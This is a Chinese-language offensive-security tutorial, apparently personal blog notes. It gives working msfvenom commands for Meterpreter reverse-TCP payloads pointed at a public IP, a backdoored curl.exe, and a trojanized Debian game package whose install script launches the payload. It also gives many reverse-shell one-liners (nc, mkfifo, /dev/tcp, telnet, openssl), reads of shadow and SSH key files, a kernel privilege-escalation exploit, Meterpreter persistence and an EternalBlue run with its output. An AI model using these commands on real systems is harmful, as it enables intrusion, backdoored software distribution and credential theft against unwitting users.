<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=175.178.254.75 LPORT=4444 -b &quot;\x00&quot; -e x86/shikata_ga_nai -i 10 | msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=175.178.254.75 LPORT=4444 -b &quot;\x00&quot; -e x86/alpha_upper -i 20 -f exe -o /root/curl2.exe</span><br></pre></td></tr></table></figure>



<h5 id="branch-2-模拟黑客给真正的curl-exe软件加上后门"><a href="#branch-2-模拟黑客给真正的curl-exe软件加上后门" class="headerlink" title="branch 2 模拟黑客给真正的curl.exe软件加上后门"></a>branch 2 模拟黑客给真正的curl.exe软件加上后门</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=175.178.254.75 LPORT=4444 -b &quot;\x00&quot; -e x86/shikata_ga_nai -x /root/curl.exe -i 10 -f exe -o /root/curl</span><br><span class="line">3.exe</span><br></pre></td></tr></table></figure>

<p>-x :添加基础可执行的文件，此处需要自己准备</p>
<h3 id="part-1-linux恶意软件-后门"><a href="#part-1-linux恶意软件-后门" class="headerlink" title="part 1 linux恶意软件 后门"></a>part 1 linux恶意软件 后门</h3><p>制作恶意deb软件包来触发后门</p>
<h4 id="steps"><a href="#steps" class="headerlink" title="steps"></a>steps</h4><p><strong>step 1.apt –download-only install packagename</strong></p>
<p><strong>step 2.dpkg -x &#x2F;var&#x2F;cahce&#x2F;apt&#x2F;freesweep &#x2F;root&#x2F;free 解压deb到&#x2F;root</strong></p>
<p><strong>step 3.msf生成后门</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=175.178.254.75 LPORT=4444 -b &quot;\x00&quot; -i 10 -f elf -o /root/free/usr/games/freesweep_s</span><br><span class="line">ource</span><br></pre></td></tr></table></figure>



<p>msfvenom 生成后门命令</p>
<p>-a :架构</p>
<p>–platform :平台</p>
<p>-p :payload</p>
<p>LHOST :负载参数</p>
<p>LPORT：负载参数</p>
<p>-b :消除坏字符”\x00“</p>
<p>-i :编码次数</p>
<p>-f :文件类型</p>
<p>-o :output 文件</p>
<p>-e :编码器 可以通过命令 –list encoders 列出可用的编码器</p>
<p>拓展生成软件包时无论是payload和软件包都要选择能够在目标操作系统上执行的</p>
<p><strong>step 4 创建软件包信息目录</strong></p>
<p>tee &#x2F;root&#x2F;free&#x2F;DEBIAN&#x2F;control &lt;&lt;bye<br>Package:freesweep<br>Version:1.0.1-1<br>Section:Games and Amusement<br>Priority:optional<br>Architecture:amd64<br>Maintainer:Ubuntu MOTU Developers (<a href="mailto:&#x75;&#98;&#x75;&#110;&#116;&#117;&#x2d;&#109;&#x6f;&#116;&#117;&#x40;&#x6c;&#x69;&#x73;&#116;&#x73;&#46;&#x75;&#x62;&#117;&#x6e;&#x74;&#117;&#46;&#x63;&#111;&#109;">&#x75;&#98;&#x75;&#110;&#116;&#117;&#x2d;&#109;&#x6f;&#116;&#117;&#x40;&#x6c;&#x69;&#x73;&#116;&#x73;&#46;&#x75;&#x62;&#117;&#x6e;&#x74;&#117;&#46;&#x63;&#111;&#109;</a>)<br>Description:a text-based minesweeper<br>freesweep is an im plementation of the popular minesweeper games,where one tries to find all the <br>mines without igniting any,based on hints given by the computer.<br>bye</p>
<p><strong>step 5创建deb软件包安装脚本文件，来加载后门</strong>**</p>
<p>tee &#x2F;root&#x2F;free&#x2F;DEBIAN&#x2F;postinst &lt;&lt;bye<br>#!&#x2F;bin&#x2F;bash<br>sudo chmod 2755 usr&#x2F;games&#x2F;freesweep_sources<br>sudo usr&#x2F;games&#x2F;freesweep_souces &amp;<br>bye</p>
<p>ps:创建完成文件需要给文件赋权 (必须 &gt;&#x3D;0555 且 &lt;&#x3D;0775)</p>
<p><strong>step 6构建软件包deb</strong></p>
<p>dpkg-deb –build &#x2F;root&#x2F;free&#x2F;</p>
<h3 id="part2-制作linux软件来制作后门程序"><a href="#part2-制作linux软件来制作后门程序" class="headerlink" title="part2 制作linux软件来制作后门程序"></a>part2 制作linux软件来制作后门程序</h3><p>steps:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=175.178.254.75 LPORT=4444 -b &quot;\x00&quot; -i 10 -f elf -o /root/backdoor</span><br></pre></td></tr></table></figure>

<p>将后门上传linux靶机赋权chmod +x backdoor</p>
<p>并执行 source backdoor</p>
<h3 id="part-3-利用0day漏洞制作后门"><a href="#part-3-利用0day漏洞制作后门" class="headerlink" title="part 3 利用0day漏洞制作后门"></a>part 3 利用0day漏洞制作后门</h3><p>0day漏洞是专门针对软件的，后来发展到游戏，音乐，视频等内容，本节以cve-2018-8174漏洞为例，制作木马后门程序，用户的电脑在浏览网页或者打开office文档时候都有可能中招，最终被黑客控制电脑</p>
<p>1.安装CVE-2018-8174_EXP模块</p>
<p>step :</p>
<p>从github下载exp到kali</p>
<p>2.生成html</p>
<p>python2 CVE-2018-8174.py -u <a target="_blank" rel="noopener" href="http://175.178.254.75/CVE-2018-8174.html">http://175.178.254.75/CVE-2018-8174.html</a> -o hack.rft -i 175.178.254.75 -p 4444</p>
<p>此处必须用python2</p>
<p>3.后门监听</p>
<p>exploit的payload :generic&#x2F;shell_reverse_tcp可以建立连接</p>
<h2 id="Section5后渗透攻击"><a href="#Section5后渗透攻击" class="headerlink" title="Section5后渗透攻击"></a>Section5后渗透攻击</h2><h3 id="Sect-5-1-Linux-platform后渗透攻击方式"><a href="#Sect-5-1-Linux-platform后渗透攻击方式" class="headerlink" title="Sect 5.1 Linux platform后渗透攻击方式"></a>Sect 5.1 Linux platform后渗透攻击方式</h3><h4 id="part0-Linux生成后门shell"><a href="#part0-Linux生成后门shell" class="headerlink" title="part0 Linux生成后门shell"></a>part0 Linux生成后门shell</h4><h5 id="1-nc生成正向shell"><a href="#1-nc生成正向shell" class="headerlink" title="1)nc生成正向shell"></a>1)nc生成正向shell</h5><p>被控端：</p>
<p>nc -lvvp 6666 -e &#x2F;bin&#x2F;bash</p>
<p>控制端</p>
<p>nc 192.168.1.120 6666</p>
<h5 id="2-nc-反向shell"><a href="#2-nc-反向shell" class="headerlink" title="2)nc 反向shell"></a>2)nc 反向shell</h5><p>第一种，生成被控端shell的思路是在被控端生成一个封闭的回环，来自控制端的指令经过&#x2F;bin&#x2F;bash的执行后，结果回传控制端</p>
<p>故第一种反向shell就有了</p>
<p>被控端：</p>
<p>nc 192.168.1.200 6666 -e &#x2F;bin&#x2F;bash</p>
<p>控制端：nc -lvvp 6666</p>
<h6 id="a利用管道制作反向shell"><a href="#a利用管道制作反向shell" class="headerlink" title="a利用管道制作反向shell"></a><strong>a利用管道制作反向shell</strong></h6><p>rm &#x2F;tmp&#x2F;p ;mkfifo &#x2F;tmp&#x2F;p;cat &#x2F;tmp&#x2F;p | &#x2F;bin&#x2F;bash -i 2&gt;&amp;1 | nc 192.168.1.200 6666 &gt;&#x2F;tmp&#x2F;p</p>
<p>核心命令市nc 网络命令和管道&#x2F;tmp&#x2F;p</p>
<p>mkfifo: 创建管道命令</p>
<p>&#x2F;bin&#x2F;bash:执行管道输入的命令 并通过后面的管道符”|“将结果回传nc</p>
<p>nc:接收&#x2F;bin&#x2F;bash 执行结果回传nc服务监听端（攻击主机监听），并接收攻击主机发送指令传到&#x2F;tmp&#x2F;p管道</p>
<p>执行流程梳理：</p>
<p>1.nc:接收指令，输出默认是stdout回显，但是由于后面跟着重定向符号 将回显传送给了管道&#x2F;tmp&#x2F;p</p>
<p>2.cat &#x2F;tmp&#x2F;p 查看管道内容，本应回显终端，由于后面管道符的作用，输出重定向为后面命令的stdin</p>
<p>3.&#x2F;bin&#x2F;bash 执行2传来的stdin命令，并将结果通过后面的管道符传给nc，作为nc的stdin，注意此处的2&gt;&amp;1不能缺，否则错误命令的执行结果没有回显</p>
<p>4.由nc的特性，知道nc的stdin会通过nc传送到服务端nc</p>
<p>整个过程总结一句话：nc服务端的指令通过nc 给&#x2F;bin&#x2F;bash执行后又通过nc回传nc服务端，实现反向shell的作用</p>
<p>由nc的可执行的options，可将上述指令写作</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">rm /tmp/p ;mkfifo /tmp/p;cat /tmp/p | nc 192.168.1.200 6666 -e /bin/bash &gt;/tmp/p 2&gt;&amp;1</span><br></pre></td></tr></table></figure>

<h6 id="b利用块文件制作反向shell"><a href="#b利用块文件制作反向shell" class="headerlink" title="b利用块文件制作反向shell"></a>b利用块文件制作反向shell</h6><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mknod backblock p ; nc 192.168.1.200 6666 &lt;backblock | /bin/bash &gt;backblock 2&gt;&amp;1 </span><br></pre></td></tr></table></figure>

<p>mknod :创建块设备，p是创建的设备类型（b      创建有缓冲的区块特殊文件；c, u   创建(没有缓冲的)字符特殊文件 ，p创建先进先出(FIFO)特殊文件）</p>
<p>通过创建的fifo特殊文件backblock实现了nc指令执行和结果回传的循环，详细执行流程见管道反向shell的流程梳理</p>
<h5 id="3）bash"><a href="#3）bash" class="headerlink" title="3）bash"></a>3）bash</h5><p>被控端：</p>
<p>bash -i &gt;&amp;&#x2F;dev&#x2F;tcp&#x2F;192.168.1.200&#x2F;6666 0&gt;&amp;1 2&gt;&amp;1</p>
<p>控制端：</p>
<p>nc -lvvp 6666</p>
<h5 id="4-perl"><a href="#4-perl" class="headerlink" title="4)perl"></a>4)perl</h5><p>perl反弹shell的代码</p>
<p>或者通过msfvenom的模块建立连接</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -l payloads | grep &quot;perl&quot; | awk &quot;&#123;print \$1&#125;&quot;</span><br></pre></td></tr></table></figure>

<h5 id="5-python"><a href="#5-python" class="headerlink" title="5)python"></a>5)python</h5><p>被控制端：</p>
<p>python代码调用建立反向连接的shell（代码比较长，到时候自己百度）</p>
<p>控制端：</p>
<p>msfvenom -p python&#x2F;meterpreter&#x2F;reverse_tcp LHOST&#x3D;192.168.1.120 LPORT&#x3D;6666</p>
<p>或者 ：handler -p python&#x2F;meterpreter&#x2F;reverse_tcp -H 192.168.1.120 -p 6666</p>
<p>或者查找msfvenom支持python的payloads</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -l payloads | grep &quot;python&quot; | awk &quot;&#123;print \$1&#125;&quot;</span><br></pre></td></tr></table></figure>

<h5 id="6-python"><a href="#6-python" class="headerlink" title="6)python"></a>6)python</h5><h5 id="7-telnet"><a href="#7-telnet" class="headerlink" title="7)telnet"></a>7)telnet</h5><p>telnet生成反弹shell的方式同nc</p>
<p>控制端：</p>
<p>nc -lvvp 6666</p>
<p>被控制端：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">rm -f a; mknod a p;telnet 192.168.1.120 6666 0&lt;a | /bin/bash  1&gt;a  2&gt;&amp;1</span><br></pre></td></tr></table></figure>

<p>或者</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">rm -f a &amp;&amp;  mknod a p &amp;&amp;telnet 192.168.1.120 6666 0&lt;a | /bin/bash  1&gt;a  2&gt;&amp;1</span><br></pre></td></tr></table></figure>

<h5 id="8-openssl"><a href="#8-openssl" class="headerlink" title="8)openssl"></a>8)openssl</h5><p>openssl，厂商一般都有流量监控设备，直接传输报文会被审查到</p>
<p>steps:</p>
<ul>
<li><p><input disabled="" type="checkbox"> 
在控制端生成密钥文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes</span><br></pre></td></tr></table></figure>


</li>
<li><p><input disabled="" type="checkbox"> 
在远程控制端启动监视器</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">openssl s_server -quiet -key key.pem  -cert cert.pem -port 443</span><br></pre></td></tr></table></figure>


</li>
<li><p><input disabled="" type="checkbox"> 
在目标机反弹shell</p>
<p>mkfifo &#x2F;tmp&#x2F;p ;&#x2F;bin&#x2F;bash -i &lt;&#x2F;tmp&#x2F;p 2&gt;&amp;1 | openssl s_client -quiet -connect <attacker-ip> :<attacker-port>  &gt;&#x2F;tmp&#x2F;p</p>
</li>
</ul>
<h4 id="part-1-linux内核漏洞提权"><a href="#part-1-linux内核漏洞提权" class="headerlink" title="part 1 linux内核漏洞提权"></a>part 1 linux内核漏洞提权</h4><h5 id="01-Linux系统提权信息收集"><a href="#01-Linux系统提权信息收集" class="headerlink" title="01.Linux系统提权信息收集"></a>01.Linux系统提权信息收集</h5><p>查看系统信息 </p>
<p>cat &#x2F;etc&#x2F;*release</p>
<p>cat &#x2F;etc&#x2F;issue</p>
<p>lsb_release -a</p>
<p>查看内核信息</p>
<p>uname -a </p>
<p>uname -mrs</p>
<p>查看环境变量</p>
<p>cat &#x2F;etc&#x2F;profile</p>
<p>cat &#x2F;etc&#x2F;bashrc</p>
<p>cat ~&#x2F;.bash_profile</p>
<p>cat ~&#x2F;.bashrc</p>
<p>cat ~&#x2F;.bash_logout </p>
<p>env</p>
<p>set</p>
<p>自动化信息收集linpeas.sh</p>
<p>查看网络信息</p>
<p>&#x2F;sbin&#x2F;ifconfig </p>
<p>cat &#x2F;etc&#x2F;network&#x2F;interfaces</p>
<p>cat &#x2F;etc&#x2F;sysconfig&#x2F;network</p>
<p>查看进程和服务</p>
<p>ps aux</p>
<p>ps -ef</p>
<p>top</p>
<p>cat &#x2F;etc&#x2F;services</p>
<p>安装的应用程序</p>
<p>ls -alh &#x2F;sbin</p>
<p>dpkg -l</p>
<p>rpm -qa</p>
<p>ls -alh &#x2F;var&#x2F;cache&#x2F;apt&#x2F;archives</p>
<p>ls -alh &#x2F;var&#x2F;cache&#x2F;yum</p>
<p>查看服务配置错误</p>
<p>cat &#x2F;etc&#x2F;syslog.conf</p>
<p>cat &#x2F;etc&#x2F;chttp.conf</p>
<p>cat &#x2F;etc&#x2F;lighttp.conf</p>
<p>cat &#x2F;etc&#x2F;cups&#x2F;cupsd.conf</p>
<p>cat &#x2F;etc&#x2F;inetd.conf</p>
<p>cat &#x2F;etc&#x2F;apache2&#x2F;appache2.conf</p>
<p>cat &#x2F;etc&#x2F;my.conf</p>
<p>cat &#x2F;etc&#x2F;httpd&#x2F;conf&#x2F;httpd.conf</p>
<p>cat &#x2F;opt&#x2F;lampp&#x2F;etc&#x2F;httpd.conf</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ls -alR /etc/ | awk &#x27;$1~/^.*r.*/&#x27;</span><br></pre></td></tr></table></figure>



<p>查看系统网卡</p>
<p>&#x2F;sbin&#x2F;ifconfig -a</p>
<p>网络配置</p>
<p>cat &#x2F;etc&#x2F;resolve.conf</p>
<p>cat &#x2F;etc&#x2F;sysconfig&#x2F;network</p>
<p>cat &#x2F;etc&#x2F;networks</p>
<p>iptables -nL</p>
<p>hostname</p>
<p>用户和主机与系统通信</p>
<p>lsof -i </p>
<p>lsof -i :80</p>
<p>arp缓存路由表</p>
<p>arp -e</p>
<p>route </p>
<p>&#x2F;sbin&#x2F;route -nee</p>
<p>数据包嗅探</p>
<p>tcpdump tcp dst 192.168.1.200 and tcp dst 192.168.1.120</p>
<p>登陆用户</p>
<p>id</p>
<p>whoami</p>
<p>w</p>
<p>last</p>
<p>lastlog</p>
<p>cat &#x2F;etc&#x2F;passwd | cut -d: -f1</p>
<p>cat &#x2F;etc&#x2F;sudoers</p>
<p>sudo -l</p>
<p>查看用户敏感文件</p>
<p>cat &#x2F;etc&#x2F;passwd</p>
<p>cat &#x2F;etc&#x2F;group</p>
<p>cat &#x2F;etc&#x2F;shadow</p>
<p>ls -aRl &#x2F;var&#x2F;mail&#x2F;</p>
<p>用户家目录</p>
<p>ls -ahlR &#x2F;root&#x2F;</p>
<p>ls -ahlR &#x2F;home&#x2F;</p>
<p>查看脚本-数据库-日志文件-配置文件</p>
<p>cat &#x2F;var&#x2F;apache2&#x2F;config.inc</p>
<p>cat &#x2F;var&#x2F;lib&#x2F;mysql&#x2F;mysql&#x2F;user.MYD</p>
<p>cat &#x2F;root&#x2F;anaconda-ks.cfg</p>
<p>查看历史记录</p>
<p>cat ~&#x2F;.bash_history</p>
<p>cat ~&#x2F;.nano_history</p>
<p>cat ~&#x2F;.atftp_history</p>
<p>cat ~&#x2F;.mysql_history</p>
<p>cat ~&#x2F;.phphistory</p>
<p>日志文件分析</p>
<p>cat &#x2F;var&#x2F;httpd&#x2F;logs&#x2F;access_log</p>
<p>cat &#x2F;var&#x2F;httpd&#x2F;logs&#x2F;error_log</p>
<p>cat &#x2F;var&#x2F;apache2&#x2F;logs&#x2F;access_log</p>
<p>cat &#x2F;var&#x2F;apach2&#x2F;logs&#x2F;error_log</p>
<p>ssh私钥信息</p>
<p>cat ~&#x2F;.ssh&#x2F;authorized_keys</p>
<p>cat ~&#x2F;.ssh&#x2F;id_rsa.pub</p>
<p>cat ~&#x2F;.ssh&#x2F;id_rsa</p>
<p>cat ~&#x2F;.ssh&#x2F;id_dsa.pub</p>
<p>cat ~&#x2F;.ssh&#x2F;id_dsa</p>
<p>上传文件环境</p>
<p>find &#x2F; -name nc*</p>
<p>find &#x2F; -name wget</p>
<p>find &#x2F;-name netcat*</p>
<p>find &#x2F; -name tftp*</p>
<p>find &#x2F; -name ftp</p>
<p>支持的语言开发环境</p>
<p>find &#x2F; -name perl*</p>
<p>find &#x2F;-name python*</p>
<p>find &#x2F; -name gcc*</p>
<p>find &#x2F; -name cc</p>
<h5 id="02-内核漏洞提权"><a href="#02-内核漏洞提权" class="headerlink" title="02 内核漏洞提权"></a>02 内核漏洞提权</h5><h6 id="1-exp漏洞查询网站接口"><a href="#1-exp漏洞查询网站接口" class="headerlink" title="1 )exp漏洞查询网站接口"></a>1 )exp漏洞查询网站接口</h6><p>rapid7.com&#x2F;db       msf公司提供</p>
<p>提供一个linux已经暴漏的内核漏洞的集合</p>
<p><a target="_blank" rel="noopener" href="https://github.com/SecWiki/linux-kernel-exploits">https://github.com/SecWiki/linux-kernel-exploits</a></p>
<p>从集合找到漏洞的exploit-db网站的利用代码的链接</p>
<p>exploit-db.com</p>
<h6 id="2-searchsploit-工具"><a href="#2-searchsploit-工具" class="headerlink" title="2) searchsploit 工具"></a>2) searchsploit 工具</h6><p>searchexploit是一个检索exp信息的工具，他将在exploit-db.com中检索可以使用的信息</p>
<p>实例</p>
<p>step0 目标机信息收集</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">curl -s -L  http://192.168.1.200/webload/wintool/linpeas.sh | sh</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">[thaygo@MiWiFi-R4CM-srv home]$ uname -mrs</span><br><span class="line">Linux 4.18.0-348.el8.x86_64 x86_64</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>内核版本 linux 4.18.0</p>
<p>step 1更新searchsploit</p>
<p>searchsploit -u</p>
<p>更新需要的space比较大，请确认disk有足够的空间</p>
<p>step 2 搜索响应的内核版本</p>
<p>searchsploit linux kernel 4.18.0</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">searchsploit linux kernel 4.18.0</span><br></pre></td></tr></table></figure>

<p><img src="C:\Users\Thaygo\AppData\Roaming\Typora\typora-user-images\image-20220603155009987.png" alt="image-20220603155009987"></p>
<p>searchsploit搜索结果如图所示，比较内核版本4.18.0 介于其中的4.10.0 &lt;5.1.17版本之间，且从该漏洞的描述可知，该代码是用来进行本地提权的，所以可以用在本系统，搜索结果的右半块是 利用代码的路径</p>
<p>searchsploit -p 47163.c   #查看利用代码的详细信息</p>
<p><img src="C:\Users\Thaygo\AppData\Roaming\Typora\typora-user-images\image-20220603155657146.png" alt="image-20220603155657146"></p>
<p>searchsploit -m 47163.c #复制文件到本地</p>
<p>然后对源代码进行编译</p>
<p>gcc 47163.c -o exp.4.18.0</p>
<h2 id="section-5-2-windows后渗透攻击方式"><a href="#section-5-2-windows后渗透攻击方式" class="headerlink" title="section 5.2 windows后渗透攻击方式"></a>section 5.2 windows后渗透攻击方式</h2><h3 id="part-2-Windows-权限维持"><a href="#part-2-Windows-权限维持" class="headerlink" title="part 2 Windows 权限维持"></a>part 2 Windows 权限维持</h3><h4 id="3）meterpreter权限维持—–persistence模块"><a href="#3）meterpreter权限维持—–persistence模块" class="headerlink" title="3）meterpreter权限维持—–persistence模块"></a>3）meterpreter权限维持—–persistence模块</h4><p>使用下面命令生成的后面呢payload,会添加到自启动注册表</p>
<p>run persistence -U -S -X -P  [payload] -i [time retry connect] -p [rport] -r [rhost] -L [localdir]</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">run persistence -S -i 5 -p 6666 -r 192.168.1.11 -L C:\\windows\\system32\\</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>该命令添加自启动注册表位置：</p>
<p>HKLM\Software\Microsoft\Windows\CurrentVersion\Run</p>
<p>为何+ ”-L C:windows\system32“?</p>
<p>使用run persitence 模块进行持久化时，默认路径会推送到%TEMP%，当用户重启后，持久化会报错</p>
<h4 id="4-meterpreter权限维持—–metsvc模块"><a href="#4-meterpreter权限维持—–metsvc模块" class="headerlink" title="4)meterpreter权限维持—–metsvc模块"></a>4)meterpreter权限维持—–metsvc模块</h4><p>metsvc 是开机自启动的服务化模块，服务名是meterpreter,监听端口是31337</p>
<p>run metsvc -h #服务信息</p>
<p>run metsvc -A #启动服务</p>
<p>run metsvc -r #移除服务</p>
<p>查看服务：</p>
<p>windows cmd窗口：services.msc</p>
<h4 id="5）Autorunscript"><a href="#5）Autorunscript" class="headerlink" title="5）Autorunscript"></a>5）Autorunscript</h4><p>获取服务的时候自动执行可持续化脚本,可以被自动化执行的脚本目录存放在metasploit&#x2F;scripts&#x2F;meterpreter</p>
<p>use exploit&#x2F;multi&#x2F;handler</p>
<p>set Autorunscript persistence -X -U -S -i -p 4444 -r 192.168.1.11 -L  C:\system32</p>
<h3 id="part-3-系统工具替换后门"><a href="#part-3-系统工具替换后门" class="headerlink" title="part 3 系统工具替换后门"></a>part 3 系统工具替换后门</h3><p><img src="C:\Users\Thaygo\AppData\Roaming\Typora\typora-user-images\image-20220604073640372.png" alt="image-20220604073640372"></p>
<h4 id="02-后门原理"><a href="#02-后门原理" class="headerlink" title="02 后门原理"></a>02 后门原理</h4><p><img src="C:\Users\Thaygo\AppData\Roaming\Typora\typora-user-images\image-20220604073802835.png" alt="image-20220604073802835"></p>
<p>part 3 进程注入‘dLl劫持</p>
<h4 id="03注册表"><a href="#03注册表" class="headerlink" title="03注册表"></a>03注册表</h4><p><img src="C:\Users\Thaygo\AppData\Roaming\Typora\typora-user-images\image-20220604083158137.png" alt="image-20220604083158137"></p>
<h4 id="04-task-powershell"><a href="#04-task-powershell" class="headerlink" title="04 task-powershell"></a>04 task-powershell</h4><h2 id="Section-6系统日志清理"><a href="#Section-6系统日志清理" class="headerlink" title="Section 6系统日志清理"></a>Section 6系统日志清理</h2><p>Windows eventvwr</p>
<h2 id="Section-4-实战"><a href="#Section-4-实战" class="headerlink" title="Section 4 实战"></a>Section 4 实战</h2><h3 id="实战1-利用永恒之蓝漏洞实战攻击"><a href="#实战1-利用永恒之蓝漏洞实战攻击" class="headerlink" title="实战1 利用永恒之蓝漏洞实战攻击"></a>实战1 利用永恒之蓝漏洞实战攻击</h3><p>永恒之蓝是指2017年4月14日晚，黑客团体Shadow Brokers（影子经纪人）公布一大批网络攻击工具，其中包含“永恒之蓝”工具，“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日，不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒，<a target="_blank" rel="noopener" href="https://baike.baidu.com/item/%E8%8B%B1%E5%9B%BD/144602">英国</a>、<a target="_blank" rel="noopener" href="https://baike.baidu.com/item/%E4%BF%84%E7%BD%97%E6%96%AF/125568">俄罗斯</a>、整个<a target="_blank" rel="noopener" href="https://baike.baidu.com/item/%E6%AC%A7%E6%B4%B2/145550">欧洲</a>以及中国国内多个高校校内网、大型企业内网和政府机构专网中招，被勒索支付高额赎金才能解密恢复文件。</p>
<h4 id="step-1-使用metasploit-辅助模块测试靶机渗透可行性"><a href="#step-1-使用metasploit-辅助模块测试靶机渗透可行性" class="headerlink" title="step 1.使用metasploit 辅助模块测试靶机渗透可行性"></a>step 1.使用metasploit 辅助模块测试靶机渗透可行性</h4><p><strong>auxiliary&#x2F;scanner&#x2F;smb&#x2F;smb_ms 17_010</strong>扫描辅助模块</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">msf6 auxiliary(scanner/smb/smb_ms17_010) &gt; run</span><br><span class="line"></span><br><span class="line">[+] 192.168.1.148:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7600 x64 (64-bit)</span><br><span class="line">[*] 192.168.1.148:445     - Scanned 1 of 1 hosts (100% complete)</span><br><span class="line">[*] Auxiliary module execution completed</span><br><span class="line">msf6 auxiliary(scanner/smb/smb_ms17_010) &gt; </span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h4 id="step-2-获取win7系统后门"><a href="#step-2-获取win7系统后门" class="headerlink" title="step 2.获取win7系统后门"></a>step 2.获取win7系统后门</h4><p><strong>攻击模块：exploit&#x2F;windows&#x2F;smb&#x2F;ms17_010_eternalblue</strong></p>
<p><strong>payload模块：windows&#x2F;x64&#x2F;meterpreter&#x2F;reverse_tcp</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">msf6 auxiliary(scanner/smb/smb_ms17_010) &gt; use exploit/windows/smb/ms17_010_eternalblue</span><br><span class="line">[*] Using configured payload windows/x64/meterpreter/reverse_tcp</span><br><span class="line">msf6 exploit(windows/smb/ms17_010_eternalblue) &gt; </span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>注：攻击负载模块，可以通过windows&#x2F;x64&#x2F;shell搜索到的reverse_tcp</p>
<h4 id="step-3-拿到后门"><a href="#step-3-拿到后门" class="headerlink" title="step 3.拿到后门"></a>step 3.拿到后门</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">msf6 exploit(windows/smb/ms17_010_eternalblue) &gt; set rhosts 192.168.1.148</span><br><span class="line">rhosts =&gt; 192.168.1.148</span><br><span class="line">msf6 exploit(windows/smb/ms17_010_eternalblue) &gt; run</span><br><span class="line"></span><br><span class="line">[*] Started reverse TCP handler on 192.168.1.11:4444 </span><br><span class="line">[*] 192.168.1.148:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check</span><br><span class="line">[+] 192.168.1.148:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7600 x64 (64-bit)</span><br><span class="line">[*] 192.168.1.148:445     - Scanned 1 of 1 hosts (100% complete)</span><br><span class="line">[+] 192.168.1.148:445 - The target is vulnerable.</span><br><span class="line">[*] 192.168.1.148:445 - Connecting to target for exploitation.</span><br><span class="line">[+] 192.168.1.148:445 - Connection established for exploitation.</span><br><span class="line">[+] 192.168.1.148:445 - Target OS selected valid for OS indicated by SMB reply</span><br><span class="line">[*] 192.168.1.148:445 - CORE raw buffer dump (25 bytes)</span><br><span class="line">[*] 192.168.1.148:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42  Windows 7 Home B</span><br><span class="line">[*] 